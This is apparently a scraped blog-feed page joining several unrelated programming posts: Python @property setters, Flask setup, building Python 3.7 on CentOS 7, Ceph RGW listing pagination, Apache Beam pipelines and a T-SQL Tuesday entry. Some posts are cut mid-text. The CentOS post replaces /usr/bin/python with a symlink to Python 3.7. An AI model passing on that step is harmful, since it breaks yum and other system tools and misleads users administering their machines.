person = Person('selva', 'prabhakaran')
print(person.fullname)
#> selva prabhakaran

# Change last name to Prasanna
person.last = 'prasanna'

# Print fullname
print(person.fullname)
#> selva prasanna

3. The setter method: When to use it and How to define one?

Now you are able to access the fullname like an attribute.

However there is one final problem.

Your users are going to want to change the fullname property at some point. And by setting it, they expect it will change the values of the first and last names from which fullname was derived in the first place.

But unfortunately, trying to set the value of fullname throws an AttributeError .

person.fullname = 'raja rajan'

#> ---------------------------------------------------------------------------
#> AttributeError                            Traceback (most recent call last)
#> <ipython-input-36-67cde7461cfc> in <module>
#> ----> 1 person.fullname = 'raja rajan'
#> AttributeError: can't set attribute

How to tackle this?

We define an equivalent setter method that will be called every time a user sets a value to this property.

Inside this setter method, you can modify the values of variables that should be changed when the value of fullname is set/changed.

However, there are a couple of conventions you need to follow when defining a setter method:

The setter method should have the same name as the method decorated with @property , and it should accept the value to be set as an argument.

Finally, you need to add a @{methodname}.setter decorator just before the method definition.

Once you add the @{methodname}.setter decorator to it, this method will be called every time the property ( fullname in this case) is set or changed. See below.

class Person():
    def __init__(self, firstname, lastname):
        self.first = firstname
        self.last = lastname

    @property
    def fullname(self):
        return self.first + ' ' + self.last

    @fullname.setter
    def fullname(self, name):
        firstname, lastname = name.split()
        self.first = firstname
        self.last = lastname

    def email(self):
        return '{}.{}@email.com'.format(self.first, self.last)

# Init a Person
person = Person('selva', 'prabhakaran')
print(person.fullname)
#> selva prabhakaran
print(person.first)
#> selva
print(person.last)
#> prabhakaran

# Setting fullname calls the setter method and updates person.first and person.last
person.fullname = 'velu pillai'

# Print the changed values of `first` and `last`
print(person.fullname)
#> velu pillai
print(person.first)
#> velu
print(person.last)
#> pillai

There you go. We set a new value to person.fullname , and person.first and person.last updated as well. Our Person class will now automatically update the derived attribute (property) when one of the base attributes changes, and vice versa.
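As an aside, the @property decorator is just syntactic sugar over the built-in property() function, so the same read/write behavior can be wired up explicitly. Here is a minimal sketch with the same Person fields (the _get_fullname / _set_fullname names are my own):

```python
class Person():
    def __init__(self, firstname, lastname):
        self.first = firstname
        self.last = lastname

    def _get_fullname(self):
        return self.first + ' ' + self.last

    def _set_fullname(self, name):
        firstname, lastname = name.split()
        self.first = firstname
        self.last = lastname

    # Equivalent to stacking @property and @fullname.setter on two methods
    fullname = property(_get_fullname, _set_fullname)

person = Person('selva', 'prabhakaran')
person.fullname = 'velu pillai'
print(person.fullname)
#> velu pillai
```

The decorator form is usually preferred for readability, but knowing the property() call makes it clear that nothing magical is happening.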

4. Conclusion

Hope the purpose of @property is clear and you now know when and how to use it. If you did, congratulations! I will meet you in the next one.


          Install Flask and create your first web application      Cache   Translate Page      

There are a ton of Python web frameworks and Flask is one of them, but it is not a full stack web framework.

It is “a microframework for Python based on Werkzeug , Jinja 2 and good intentions.” It includes a built-in development server and unit testing support, and is fully Unicode-enabled with RESTful request dispatching and WSGI compliance.

Installation

To install Flask you can go here or just follow the steps below:

Step 1: Install virtual environment

If you are using Python 3, you don't have to install a virtual environment tool because it already comes with the venv module to create virtual environments.

If you are using Python 2, the venv module is not available. Instead, install virtualenv .

On linux, virtualenv is provided by your package manager:

# Debian, Ubuntu
$ sudo apt-get install python-virtualenv

# CentOS, Fedora
$ sudo yum install python-virtualenv

# Arch
$ sudo pacman -S python-virtualenv

If you are on Mac OS X or Windows, download get-pip.py , then:

$ sudo python2 Downloads/get-pip.py
$ sudo python2 -m pip install virtualenv

On Windows, as an administrator:

\Python27\python.exe Downloads\get-pip.py
\Python27\python.exe -m pip install virtualenv

Step 2: Create an environment

Create a project folder and a venv folder within:

mkdir myproject
cd myproject
python3 -m venv venv

On Windows:

py -3 -m venv venv

If you needed to install virtualenv because you are on an older version of Python, use the following command instead:

virtualenv venv

On Windows:

\Python27\Scripts\virtualenv.exe venv

Activate the environment

Before you work on your project, activate the corresponding environment:

. venv/bin/activate

On Windows:

venv\Scripts\activate

Your shell prompt will change to show the name of the activated environment.

Step 3: Install Flask

Within the activated environment, use the following command to install Flask:

$ pip install Flask

Flask is now installed. Check out the Quickstart or go to the Documentation .

Create an application

So, let's build the simplest hello world application.

Follow these steps:

As you are already in the myproject folder, create a file hello.py and write the code below.

Import the Flask class. An instance of this class will be our WSGI application.

from flask import Flask

Next we create an instance of this class. The first argument is the name of the application’s module or package. If you are using a single module (as in this example), you should use __name__ because depending on whether it’s started as an application or imported as a module, the name will be different ('__main__' versus the actual import name). This is needed so that Flask knows where to look for templates, static files, and so on.

app = Flask(__name__)

We then use the route() decorator to tell Flask what URL should trigger our function. The function is given a name which is also used to generate URLs for that particular function, and returns the message we want to display in the user’s browser.

@app.route('/')
def hello_world():
    return 'Hello, World!'

Make sure to not call your application flask.py because this would conflict with Flask itself.

To run the application you can either use the flask command or python’s -m switch with Flask. Before you can do that you need to tell your terminal the application to work with by exporting the FLASK_APP environment variable:

$ export FLASK_APP=hello.py
$ flask run

# Or you can use:
$ export FLASK_APP=hello.py
$ python -m flask run
Go to http://127.0.0.1:5000/ to see your project running.

Check out my blog: SourceAI


          python2.7.5升级到python      Cache   Translate Page      

With some spare time on my hands, I installed CentOS 7 in a virtual machine, only to find its bundled Python version is 2.7.5. I decided to upgrade to the latest release and write the process down to share, in case someone finds it useful.

1. Download the latest Python:

wget https://www.python.org/ftp/python/3.7.1/Python-3.7.1.tgz

2. Extract the archive

tar -zxvf Python-3.7.1.tgz

3. Enter the extracted directory

cd Python-3.7.1

4. Create the installation directory

mkdir /usr/local/python-3.7.1

5. Configure the build

./configure --prefix=/usr/local/python-3.7.1

Watch out for this pitfall: if you see "no acceptable C compiler found in $PATH", make sure the build toolchain is installed; if not, run yum install gcc to install gcc.

6. Build and install:

make && make install

Watch out: if you see "zipimport.ZipImportError: can’t decompress data; zlib not available", run yum -y install zlib* to install zlib.

If you see "ModuleNotFoundError: No module named '_ctypes'", run yum install libffi-devel -y to install libffi-devel.

7. Back up the original python binary:

mv /usr/bin/python /usr/bin/python.bak

8. Create a symlink

ln -s /usr/local/python-3.7.1/bin/python3.7 /usr/bin/python

Congratulations: if everything went smoothly, the upgrade succeeded. Good luck!

Tags: python py


          ceph-rgw-delimiter-and-nextmarker      Cache   Translate Page      

Ceph RGW's list-bucket API returns only the first 1000 objects by default. For buckets with more than 1000 objects, the first response carries two fields, IsTruncated and NextMarker, that indicate how to fetch the next 1000 objects, similar to pagination:

Reproducing and resolving the list-bucket delimiter problem

Running list-bucket with boto

The script is as follows:

import os
import sys

import boto
from boto.s3.connection import S3Connection

reload(sys)
sys.setdefaultencoding('utf-8')

# get config from environment or ...
host = os.environ["s3_endpoint"]
access_key = os.environ["access_key"]
secret_key = os.environ["secret_key"]
bucket_name = "hdg2-gcp-bossweb"

conn = S3Connection(access_key, secret_key, host=host,
                    calling_format=boto.s3.connection.OrdinaryCallingFormat(),
                    is_secure=False)
# print conn.get_all_buckets()
bucket = conn.get_bucket(bucket_name)

marker = ""
while True:
    filelist = bucket.get_all_keys(marker=marker)
    for file in filelist:
        print("%s\t%s\t%s" % (file.last_modified, file.name, file.size))
    if filelist.is_truncated == False:
        break
    marker = filelist.next_marker
    print(marker)

The captured request:


ceph-rgw-delimiter-and-nextmarker

The response is as follows:

<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
  <Name>hdg2-gcp-bossweb</Name>
  <Prefix />
  <Marker />
  <MaxKeys>1000</MaxKeys>
  <IsTruncated>true</IsTruncated>
  <EncodingType>url</EncodingType>
  <Contents>
    <Key>bosswebfiles%2Fattachment%2F1495115517299a0165c74-4ca4-4c2f-9d66-2e89fbaeef8c.jpg</Key>
    <LastModified>2017-05-18T13:51:57.000Z</LastModified>
    <ETag>"50d0c18045f9b92ae52a66cf4d82701b"</ETag>
    <Size>402987</Size>
    <StorageClass>STANDARD</StorageClass>
    <Owner>
      <ID>p-gcp</ID>
      <DisplayName>p-gcp</DisplayName>
    </Owner>
  </Contents>
  ...
  <Contents>
    <Key>bosswebfiles%2Fattachment%2F152828637501198245d2a-e1a4-46e6-9502-648959a7045a.jpg</Key>
    <LastModified>2018-06-06T11:59:35.000Z</LastModified>
    <ETag>"7cbcd767f1a282f48b6ed0f7ec2f4fa2"</ETag>
    <Size>160286</Size>
    <StorageClass>STANDARD</StorageClass>
    <Owner>
      <ID>p-gcp</ID>
      <DisplayName>p-gcp</DisplayName>
    </Owner>
  </Contents>
</ListBucketResult>

Summary:
- No delimiter was specified, so objects are listed directly by key, without building a directory hierarchy
- An empty marker means the listing starts from the first object
- IsTruncated is true in the response, meaning this is not the last page
- Yet the response contains no NextMarker attribute, so there is no way to fetch the next page of objects

Trying with s3cmd

Listing the top-level directory

The request is as follows


ceph-rgw-delimiter-and-nextmarker

The response is as follows:

<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
  <Name>hdg2-gcp-bossweb</Name>
  <Prefix />
  <Marker />
  <MaxKeys>1000</MaxKeys>
  <Delimiter>/</Delimiter>
  <IsTruncated>false</IsTruncated>
  <CommonPrefixes>
    <Prefix>bosswebfiles/</Prefix>
  </CommonPrefixes>
</ListBucketResult>

Summary: the delimiter is /

Listing a subdirectory with s3cmd

The request is as follows:


ceph-rgw-delimiter-and-nextmarker

The response is as follows:

<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
  <Name>hdg2-gcp-bossweb</Name>
  <Prefix>bosswebfiles/</Prefix>
  <Marker />
  <MaxKeys>1000</MaxKeys>
  <Delimiter>/</Delimiter>
  <IsTruncated>false</IsTruncated>
  <CommonPrefixes>
    <Prefix>bosswebfiles/attachment/</Prefix>
  </CommonPrefixes>
</ListBucketResult>

Summary: the delimiter is /

Listing the directory that holds the files with s3cmd

The request is as follows:


ceph-rgw-delimiter-and-nextmarker

Part of the response is as follows:

<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
  <Name>hdg2-gcp-bossweb</Name>
  <Prefix>bosswebfiles/attachment/</Prefix>
  <Marker />
  <NextMarker>bosswebfiles/attachment/152828637501198245d2a-e1a4-46e6-9502-648959a7045a.jpg</NextMarker>
  <MaxKeys>1000</MaxKeys>
  <Delimiter>/</Delimiter>
  <IsTruncated>true</IsTruncated>
  <Contents>
    <Key>bosswebfiles/attachment/1495115517299a0165c74-4ca4-4c2f-9d66-2e89fbaeef8c.jpg</Key>
    <LastModified>2017-05-18T13:51:57.000Z</LastModified>
    <ETag>"50d0c18045f9b92ae52a66cf4d82701b"</ETag>
    <Size>402987</Size>
    <StorageClass>STANDARD</StorageClass>
    <Owner>
      <ID>p-gcp</ID>
      <DisplayName>p-gcp</DisplayName>
    </Owner>
  </Contents>
  ...
  <Contents>
    <Key>bosswebfiles/attachment/152828637501198245d2a-e1a4-46e6-9502-648959a7045a.jpg</Key>
    <LastModified>2018-06-06T11:59:35.000Z</LastModified>
    <ETag>"7cbcd767f1a282f48b6ed0f7ec2f4fa2"</ETag>
    <Size>160286</Size>
    <StorageClass>STANDARD</StorageClass>
    <Owner>
      <ID>p-gcp</ID>
      <DisplayName>p-gcp</DisplayName>
    </Owner>
  </Contents>
</ListBucketResult>

Summary: the delimiter is /, and NextMarker is bosswebfiles/attachment/152828637501198245d2a-e1a4-46e6-9502-648959a7045a.jpg

s3cmd automatically fetches the next page of objects

The request is as follows:


ceph-rgw-delimiter-and-nextmarker

The response is as follows:

<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
  <Name>hdg2-gcp-bossweb</Name>
  <Prefix>bosswebfiles/attachment/</Prefix>
  <Marker>bosswebfiles/attachment/152828637501198245d2a-e1a4-46e6-9502-648959a7045a.jpg</Marker>
  <MaxKeys>1000</MaxKeys>
  <Delimiter>/</Delimiter>
  <IsTruncated>false</IsTruncated>
  <Contents>
    <Key>bosswebfiles/attachment/15282863820674cab8349-5b34-46df-9f92-c03349080d3e.png</Key>
    <LastModified>2018-06-06T11:59:42.000Z</LastModified>
    <ETag>"fdf990d0c7e8abe0e4e251cce657d7bf"</ETag>
    <Size>1353613</Size>
    <StorageClass>STANDARD</StorageClass>
    <Owner>
      <ID>p-gcp</ID>
      <DisplayName>p-gcp</DisplayName>
    </Owner>
  </Contents>
  ...
</ListBucketResult>

Summary: the delimiter is /, and the marker is bosswebfiles/attachment/152828637501198245d2a-e1a4-46e6-9502-648959a7045a.jpg

Problem analysis

The two results above show that when objects logically sit in a subdirectory, a request without delimiter and prefix=dir returns only the first 1000 objects with IsTruncated=True, but no NextMarker is returned.

Testing on the Luminous release shows this problem no longer exists.

An example of what delimiter does

The comment above the function RGWRados::Bucket::List::list_objects in the file ceph/src/rgw/rgw_rados.cc says:

delim: do not include results that match this string. Any skipped results will have the matching portion of their name inserted in common_prefixes with a “true” mark.

The official documentation ( http://docs.ceph.com/docs/master/radosgw/s3/bucketops/ ) states:

delimiter:The delimiter between the prefix and the rest of the object name.

The practical effect of delimiter="/" is to treat / in object names as a directory separator and display the listing level by level; accordingly, setting it to - makes the hyphen act as the directory separator, as in the following example:


ceph-rgw-delimiter-and-nextmarker

<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"> <Name>hdg2-gcp-bossweb</Name> <Prefix /> <Marker /> <NextMarker>bosswebfiles/attachment/152828637501198245d2a-</NextMarker> <MaxKeys>1000</MaxKeys> <Delimiter>-</Delimiter> <IsTruncated>true</IsTruncated> <EncodingType>url</EncodingType> <CommonPrefixes> <Prefix>bosswebfiles/attachment/1495115517299a0165c74-</Prefix> </CommonPrefixes> <CommonPrefixes> <Prefix>bosswebfiles/attachment/1495115925293a32229a9-</Prefix> </CommonPrefixes> ... </ListBucketResult>

Continuing down level by level:

python list_bucket.py bosswebfiles/attachment/152828637501198245d2a-
DIR bosswebfiles/attachment/152828637501198245d2a-e1a4-

python list_bucket.py bosswebfiles/attachment/152828637501198245d2a-e1a4-
DIR bosswebfiles/attachment/152828637501198245d2a-e1a4-46e6-

python list_bucket.py bosswebfiles/attachment/152828637501198245d2a-e1a4-46e6-
DIR bosswebfiles/attachment/152828637501198245d2a-e1a4-46e6-9502-

python list_bucket.py bosswebfiles/attachment/152828637501198245d2a-e1a4-46e6-9502-
2018-06-06 11:59:35+00:00  bosswebfiles/attachment/152828637501198245d2a-e1a4-46e6-9502-648959a7045a.jpg  160286  "7cbcd767f1a282f48b6ed0f7ec2f4fa2"
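The level-by-level rollup above can be mimicked in a few lines of plain Python. This is only an illustration of the delimiter/CommonPrefixes semantics, not RGW code, and the list_keys helper is my own:

```python
def list_keys(keys, prefix="", delimiter=""):
    """Mimic S3-style listing: keys under `prefix` are either returned
    directly, or rolled up into a common prefix at the first `delimiter`
    found after the prefix."""
    contents, common_prefixes = [], []
    for key in sorted(keys):
        if not key.startswith(prefix):
            continue
        rest = key[len(prefix):]
        if delimiter and delimiter in rest:
            # roll everything up to (and including) the first delimiter
            cp = prefix + rest.split(delimiter)[0] + delimiter
            if cp not in common_prefixes:
                common_prefixes.append(cp)
        else:
            contents.append(key)
    return contents, common_prefixes

keys = [
    "bosswebfiles/attachment/a.jpg",
    "bosswebfiles/attachment/b.jpg",
    "top.txt",
]
print(list_keys(keys, delimiter="/"))
# (['top.txt'], ['bosswebfiles/'])
print(list_keys(keys, prefix="bosswebfiles/attachment/", delimiter="/"))
# (['bosswebfiles/attachment/a.jpg', 'bosswebfiles/attachment/b.jpg'], [])
```

With delimiter="-" the same function would instead roll the hyphen-separated key fragments up into prefixes, which is exactly the behavior shown in the listing above.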


          Hands on Apache Beam, building data pipelines in Python      Cache   Translate Page      


Apache Beam is an open-source SDK which allows you to build multiple data pipelines from batch- or stream-based integrations and run them in a direct or distributed way. You can add various transformations in each pipeline. But the real power of Beam comes from the fact that it is not based on a specific compute engine and is therefore platform-independent. You declare which “runner” you want to use to compute your transformation. It uses your local computing resources by default, but you can specify a Spark engine for example, or Cloud Dataflow…

In this article, I will create a pipeline ingesting a csv file and computing the mean of the Open and Close columns of a historical S&P 500 dataset. The goal here is not to give an extensive tutorial on Beam features, but rather to give you an overall idea of what you can do with it and whether it is worth going deeper into building custom pipelines with Beam. Though I only write about batch processing, streaming pipelines are a powerful feature of Beam!

Beam’s SDK can be used in various languages, Java, Python… however in this article I will focus on Python.


Installation

As of this article, Apache Beam (2.8.1) is only compatible with Python 2.7; however, a Python 3 version should be available soon. If you have python-snappy installed, Beam may crash. This issue is known and will be fixed in Beam 2.9.

pip install apache-beam Creating a basic pipeline ingesting CSV Data

For this example we will use a csv containing historical values of the S&P 500. The data looks like that:

Date,Open,High,Low,Close,Volume
03 01 00,1469.25,1478,1438.359985,1455.219971,931800000
04 01 00,1455.219971,1455.219971,1397.430054,1399.420044,1009000000

Basic pipeline

To create a pipeline, we need to instantiate the pipeline object, eventually pass some options, and declaring the steps/transforms of the pipeline.

import apache_beam as beam
from apache_beam.options.pipeline_options import PipelineOptions

options = PipelineOptions()
p = beam.Pipeline(options=options)

From the beam documentation:

Use the pipeline options to configure different aspects of your pipeline, such as the pipeline runner that will execute your pipeline and any runner-specific configuration required by the chosen runner. Your pipeline options will potentially include information such as your project ID or a location for storing files.

The PipelineOptions() method above is a command line parser that will read any standard option passed the following way:

--<option>=<value> Custom options

You can also build your custom options. In this example I set an input and an output folder for my pipeline:

class MyOptions(PipelineOptions):
    @classmethod
    def _add_argparse_args(cls, parser):
        parser.add_argument('--input',
                            help='Input for the pipeline',
                            default='./data/')
        parser.add_argument('--output',
                            help='Output for the pipeline',
                            default='./output/')

Transforms principles

In Beam, data is represented as a PCollection object. So to start ingesting data, we need to read from the csv and store this as a PCollection to which we can then apply transformations. The Read operation is considered as a transform and follows the syntax of all transformations:

[Output PCollection] = [Input PCollection] | [Transform]

These tranforms can then be chained like this:

[Final Output PCollection] = ([Initial Input PCollection] | [First Transform]
| [Second Transform]
| [Third Transform])

The pipe is the equivalent of an apply method.
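Beam can chain transforms with | because Python lets a class overload that operator via __or__. A toy illustration of the idea follows; this is my own sketch, not Beam internals:

```python
class ToyCollection:
    """Immutable toy container: applying a transform returns a new collection."""
    def __init__(self, items):
        self.items = tuple(items)

    def __or__(self, transform):
        # `collection | transform` builds a new ToyCollection from the result
        return ToyCollection(transform(self.items))

nums = ToyCollection([1, 2, 3])
doubled = nums | (lambda xs: [x * 2 for x in xs])
print(doubled.items)
# (2, 4, 6)
print(nums.items)  # the original collection is unchanged
# (1, 2, 3)
```

This mirrors the immutability described below: each transform produces a new collection and never mutates its input.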

The input and output PCollections, as well as each intermediate PCollection are to be considered as individual data containers. This allows to apply multiple transformations to the same PCollection as the initial PCollection is immutable. For example:

[Output PCollection 1] = [Input PCollection] | [Transform 1]
[Output PCollection 2] = [Input PCollection] | [Transform 2]

Reading input data and writing output data

So let’s start by using one of the readers provided to read our csv, not forgetting to skip the header row:

csv_lines = (p | ReadFromText(input_filename, skip_header_lines=1) | ...

At the other end of our pipeline we want to output a text file. So let’s use the standard writer:

... | beam.io.WriteToText(output_filename)

Transforms

Now we want to apply some transformations to our PCollection created with the Reader function. Transforms are applied to each element of the PCollection individually.

Depending on the worker that you chose, your transforms can be distributed. Instances of your transformation are then executed on each node.

The user code running on each worker generates the output elements that are ultimately added to the final output PCollection that the transform produces.

Beam has core methods (ParDo, Combine) that allows to apply a custom transform, but also has pre written transforms called composite transforms . In our example we will use the ParDo transform to apply our own functions.

We have read our csv into a PCollection , so let’s split it so we can access the Open and Close items:

… beam.ParDo(Split()) …

And define our split function so we only retain the Open and Close and return them as a dictionary:

class Split(beam.DoFn):

    def process(self, element):
        Date, Open, High, Low, Close, Volume = element.split(",")
        return [{
            'Open': float(Open),
            'Close': float(Close),
        }]

Now that we have the data we need, we can use one of the standard combiners to calculate the mean over the entire PCollection.

The first thing to do is to represent the data as a tuple so we can group by a key and then feed CombineValues with what it expects. To do that we use a custom function “CollectOpen()” which returns a list of tuples containing (1, <open_value>).

class CollectOpen(beam.DoFn):

    def process(self, element):
        # Returns a list of tuples containing (1, <open_value>)
        result = [(1, element['Open'])]
        return result

The first parameter of the tuple is fixed since we want to calculate the mean over the whole dataset, but you can make it dynamic to perform the next transform only on a sub-set defined by that key.
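Before looking at the Beam combiner itself, the reduction we are after, grouping the (1, Open) tuples by key and averaging the values, looks like this in plain Python (an illustration only, not Beam code; the helper names are my own):

```python
from collections import defaultdict

def group_by_key(pairs):
    # (key, value) tuples -> {key: [values]}
    grouped = defaultdict(list)
    for key, value in pairs:
        grouped[key].append(value)
    return dict(grouped)

def combine_mean(grouped):
    # {key: [values]} -> {key: mean(values)}
    return {key: sum(vals) / len(vals) for key, vals in grouped.items()}

# Two rows of the sample data, keyed by the fixed key 1
pairs = [(1, 1469.25), (1, 1455.219971)]
print(combine_mean(group_by_key(pairs)))
```

Beam's GroupByKey and CombineValues transforms perform the same grouping and per-key reduction, but in a way the runner can distribute across workers.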

The GroupByKey function allows to create a PCollection of all
          T-SQL Tuesday – Non-SQL Server Technologies      Cache   Translate Page      


So, this month’s T-SQL Tuesday topic is to think about a non-SQL Server technology that we want to learn.

For me, I’m going to pick machine learning.

As a DBA, I’ve always looked at machine learning as a thing for the BI guys.  I’m a DBA, after all; why do I care about that?

Well, my attitude has changed somewhat recently.  This little change all started when I listened to Alex Whittles’ keynote talk at Data Relay.  He presented a demo where a computer program used Python (I’m already a huge fan of Python in SQL Server as you may know) and SciPy (a machine learning, data sciencey type module) to play and learn a game.  Alex demonstrated how, over time, his robot was able to increase its score through machine learning algorithms.

WOW, Adrian and I looked at each other as a little light bulb came on over our heads.  For the rest of the conference I attended a number of sessions that I wouldn’t normally attend, stuff for the BI guys.  A great session from Terry McCann and an interesting one from Simon Whiteley really got the creative juices flowing.  Could the DBA use this technology to model things like performance trends, predict capacity and answer that question that we’re always asked, “have we got room on the SQL Server for just one more DB?”.

So where do I go from here?  My first port of call is going to be getting my head around Python; I’ve got a background in C programming, so that shouldn’t be too difficult.  Once I’m happy with that, it’ll be a case of hitting the blogs, courses, books and anything else that I can get my hands on to help understand the strange mysteries that are Machine Learning.

Where can I go with this?  As DBAs, we’ve got a ton of data available to us in DMVs, Query Store, etc.  Wouldn’t it be great if we could hook a little robot into all that and start building up models of how our servers behave.  Keep an eye out for the inevitable blog posts that are going to come out of it.

 


          Why Use Django Framework?       Cache   Translate Page      

When you hear Python, Django is the first framework that comes to mind. It is undoubtedly the most popular framework, and it eases your work as a developer. There are clearly a number of reasons why Django Development Services has the maximum support from developers. Here we will list out a few that should get you on board with Django too. Django is fast. What does this statement mean? When you want to develop an application with this framework, the time taken is less, the efficiency high Read More..
          Business Intelligence Analyst (Business Objects experience is required) - Calance US - Los Angeles, CA      Cache   Translate Page      
Experience with Tableau or other data visualization tools is preferred, along with experience with R, Python, NoSQL technologies such as Hadoop, Cassandra,...
From Calance - Thu, 01 Nov 2018 18:20:38 GMT - View all Los Angeles, CA jobs
          Business Intelligence Analyst - Latham & Watkins LLP - Los Angeles, CA      Cache   Translate Page      
Experience with Tableau or other data visualization tools is preferred, along with experience with R, Python, NoSQL technologies such as Hadoop, Cassandra,...
From Latham & Watkins LLP - Sat, 18 Aug 2018 05:12:35 GMT - View all Los Angeles, CA jobs
          Telecommute Cloud Data Engineer      Cache   Translate Page      
A technology company is in need of a Telecommute Cloud Data Engineer. Candidates will be responsible for the following: Designing data import and ETL processes Validating and troubleshooting data transformation and loading into SQL and noSQL databases Documenting findings, test results, and as-built configurations Must meet the following requirements for consideration: Must be able to perform data manipulation and transformation Querying SQL databases or modifying SQL statements to produce custom results Knowledge of a scripting language such as Python, Perl or Java Excellent analysis, problem-solving and organization skills Proficient with Microsoft Visio, Word and Excel Able to work on multiple projects at a time with minimal supervision
          SSIS Best Online Training (KOLKATA)      Cache   Translate Page      
SQL School is one of the best training institutes for Microsoft SQL Server Developer Training, SQL DBA Training, MSBI Training, Power BI Training, Azure Training, Data Science Training, Python Training, Hadoop Training, Tableau Training, Machine Learning Training, Oracle PL SQL Training. We have been providing Classroom Training, Live-Online Training, On Demand Video Training and Corporate trainings. All our training sessions are COMPLETELY PRACTICAL. SSIS COURSE DETAILS - FOR ONLINE TRAINING: SQL ...
          Web/Networking Programming Task.      Cache   Translate Page      
a simple web-based solution that allows you to measure the offset between the clock on the system that runs a browser and a web server. The idea for this problem was inspired by website http://time.is/... (Budget: $10 USD, Jobs: Javascript, Linux, Network Administration, PHP, Python)
          Machine Learning Algorithm Dev - $1000 ref fee - ROSS Recruitment - North York, ON      Cache   Translate Page      
Python and/or .NET (C# or VB) is a plus. Our client is a well-established leader in online sports gaming with a Technical Centre of Excellence at Yonge and...
From ROSS Recruitment - Sat, 29 Sep 2018 04:00:33 GMT - View all North York, ON jobs
          FS#60725: [seabios] File conflict /usr/share/qemu/vgabios-virtio.bin      Cache   Translate Page      
Description: Updating my sytems results in a file conflict on /usr/share/qemu/vgabios-virtio.bin.


Additional info:
* qemu 3.0.0-3
* seabios 1.11.0-1 → 1.11.0-2


Steps to reproduce:

$ sudo LANG=C pacman -Syyu
:: Synchronizing package databases...
core 136.1 KiB 1944K/s 00:00 [######################] 100%
extra 1651.9 KiB 5.43M/s 00:00 [######################] 100%
community 4.7 MiB 5.23M/s 00:01 [######################] 100%
multilib 174.8 KiB 6.32M/s 00:00 [######################] 100%
:: Starting full system upgrade...
resolving dependencies...
looking for conflicting packages...

Packages (22) brltty-5.6-6 ffmpeg-1:4.1-1 gdm-3.30.2-1
gobject-introspection-runtime-1.58.0+8+gfdaa3b1a-1
harfbuzz-2.1.1-1 harfbuzz-icu-2.1.1-1 lib32-harfbuzz-2.1.1-1
lib32-systemd-239.300-1 libgdm-3.30.2-1 libsystemd-239.300-1
mpv-1:0.29.1-3 pangomm-2.42.0-1 pipewire-0.2.3+17+g10ce1a02-1
python-pyparsing-2.3.0-1 python-sphinx-1.8.1-2
python-urllib3-1.24.1-1 ruby-sass-3.6.0-1 seabios-1.11.0-2
subversion-1.11.0-1 systemd-239.300-1 tracker-2.1.6-2
usbmuxd-1.1.0+48+g1cc8b34-1

Total Installed Size: 153.16 MiB
Net Upgrade Size: 2.46 MiB

:: Proceed with installation? [Y/n]
(22/22) checking keys in keyring [######################] 100%
(22/22) checking package integrity [######################] 100%
(22/22) loading package files [######################] 100%
(22/22) checking for file conflicts [######################] 100%
error: failed to commit transaction (conflicting files)
seabios: /usr/share/qemu/vgabios-virtio.bin exists in filesystem (owned by qemu)
Errors occurred, no packages were upgraded.

          FS#60724: [systemd] update to 239.300-1 crashes session      Cache   Translate Page      
My sessions just crashed during a, or rather, because of a, system upgrade and i believe the reason to be the systemd package.

The journal states:
systemd[1]: Reexecuting.

And everything running got SIGTERM’ed.

TTYs were not available for some time after that
>systemd-logind[828]: Failed to start autovt@tty2.service: Transport endpoint is not connected
, but eventually lightdm successfully restarted itself.

relevant pacman log excerpt:
[2018-11-06 23:28] [PACMAN] Running 'pacman -S -y --config /etc/pacman.conf --'
[2018-11-06 23:28] [PACMAN] synchronizing package lists
[2018-11-06 23:28] [PACMAN] Running 'pacman -S --ignore -u --config /etc/pacman.conf -- libsystemd systemd systemd-sysvcompat brltty gdm harfbuzz harfbuzz-icu libgdm openmpi usbmuxd firefox-developer-edition python-sphinx lib32-harfbuzz lib32-systemd'
[2018-11-06 23:28] [PACMAN] starting full system upgrade
[2018-11-06 23:28] [ALPM] transaction started
[2018-11-06 23:28] [ALPM] upgraded libsystemd (239.2-1 -> 239.300-1)
[2018-11-06 23:28] [ALPM] warning: /etc/systemd/system.conf installed as /etc/systemd/system.conf.pacnew
[2018-11-06 23:28] [ALPM] upgraded systemd (239.2-1 -> 239.300-1)
[2018-11-06 23:28] [ALPM] upgraded systemd-sysvcompat (239.2-1 -> 239.300-1)
[2018-11-06 23:28] [ALPM] upgraded brltty (5.6-5 -> 5.6-6)
[2018-11-06 23:28] [ALPM] upgraded libgdm (3.30.1-1 -> 3.30.2-1)
[2018-11-06 23:28] [ALPM] upgraded harfbuzz (2.1.0-1 -> 2.1.1-1)
[2018-11-06 23:28] [ALPM] upgraded usbmuxd (1.1.0+28+g46bdf3e-1 -> 1.1.0+48+g1cc8b34-1)
[2018-11-06 23:28] [ALPM] upgraded harfbuzz-icu (2.1.0-1 -> 2.1.1-1)
[2018-11-06 23:28] [ALPM] upgraded gdm (3.30.1-1 -> 3.30.2-1)
[2018-11-06 23:28] [ALPM] upgraded openmpi (3.1.2-1 -> 3.1.3-1)
[2018-11-06 23:28] [ALPM] transaction interrupted

          Senior Data Analyst - William E. Wecker Associates, Inc. - Jackson, WY      Cache   Translate Page      
Experience in data analysis and strong computer skills (we use SAS, Stata, R and S-Plus, Python, Perl, Mathematica, and other scientific packages, and standard...
From William E. Wecker Associates, Inc. - Mon, 22 Oct 2018 06:14:12 GMT - View all Jackson, WY jobs
          Geo Specialist      Cache   Translate Page      
For an executive agency in the province of South Holland we are looking for a Geo specialist (24 hours) who will implement changes to the data model. Tasks: implementing the technical solutions that have been devised; participating in scrum sessions; documenting the implemented changes. Requirements: a completed HBO (higher professional education) degree; experience working with a scrum method; experience with the ESRI ArcGIS product suite (ArcMap, ArcGIS Pro, ArcGIS Enterprise, ArcGIS Online); experience with Data Interoperability; experience with Python scripting; experience with a DTAP environment; experience working at a government agency. Competencies: team player; result-oriented; proactive; strong communicator; flexible; quality-minded. Upon receiving your motivation and c...
          Junior to Mid DevOps - Python      Cache   Translate Page      
MN-Minneapolis, job summary: Acts as a lead in providing application design guidance and consultation, utilizing a thorough understanding of applicable technology, tools and existing designs. Analyzes highly complex business requirements, designs and writes technical specifications to design or redesign complex computer platforms and applications. Provides coding direction to less experienced staff or develops hi
          ‘How do neural nets learn?’ A step by step explanation using the H2O Deep Learning algorithm.      Cache   Translate Page      
